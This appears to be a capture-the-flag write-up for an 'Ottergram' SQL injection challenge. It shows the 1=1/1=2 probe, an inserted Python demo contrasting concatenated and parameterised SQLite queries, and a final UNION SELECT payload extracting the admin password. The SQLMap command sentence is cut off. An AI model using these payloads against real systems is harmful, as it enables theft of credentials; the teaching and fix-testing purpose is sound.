Ottergram
Our hint today is SQLi.
Like always, I clicked happily through the application so my proxy could capture enough traffic for me to investigate. When looking for SQLi, I mainly focus on things that I suspect are part of a query. This can be the login/password combination, usernames, MFA codes, etc. Once I identify those endpoints, I add ' and 1=1-- - to all of them. If one of those endpoints returns the same value as without the payload, I'm pretty confident there's a SQLi. I found an endpoint that would return the same results with that payload, so I tried ' and 1=2 and got an error, so SQLi is possible.
Inside Burp I had to encode the payload with %20 instead of + so it became '%20AND%201=1%20--
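To show why the 1=1 / 1=2 probe above works, and to serve as a regression check for the fix, here is an added example that is not from the original post: a constructed in-memory SQLite users table, a lookup that concatenates the username into the query (the bug class the post found), and the same lookup with a bound parameter. The table contents and function names are assumptions for illustration.

```python
import sqlite3

# Probe strings from the post; the in-memory table below is constructed sample
# data standing in for the application's real users table.
TAUTOLOGY = "' and 1=1-- -"
CONTRADICTION = "' and 1=2-- -"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "wonderland"), (2, "admin", "flag-placeholder")])
    return conn

def lookup_vulnerable(conn, username):
    # The user-controlled string becomes part of the SQL text: the quote closes
    # the literal and '--' comments out whatever the application appended.
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username):
    # Bound parameter: the whole string is compared as data, quotes included.
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def looks_injectable(lookup, conn, username):
    # The post's heuristic: a tautology suffix must leave the result unchanged,
    # while a contradiction suffix must change it (here: no rows, where the
    # CTF application answered with an error).
    baseline = lookup(conn, username)
    same_with_true = lookup(conn, username + TAUTOLOGY) == baseline
    changed_with_false = lookup(conn, username + CONTRADICTION) != baseline
    return same_with_true and changed_with_false

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", looks_injectable(lookup_vulnerable, db, "alice"))
    print("parameterised query injectable:", looks_injectable(lookup_safe, db, "alice"))
```

The parameterised version returns no rows for either probe because the entire string, quotes and comment included, is matched as a username.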

After I confirmed that SQLi was possible on that endpoint, I ran SQLMap with that request using
Inside the response I found a users table with the passwords.

The admin's password was the flag 🇧🇪
The easy payload is '%20UNION%20SELECT%20null,%20null,%20null,%20null,%20null,%20null,%20password%20from%20users%20where%20username='admin'--%20-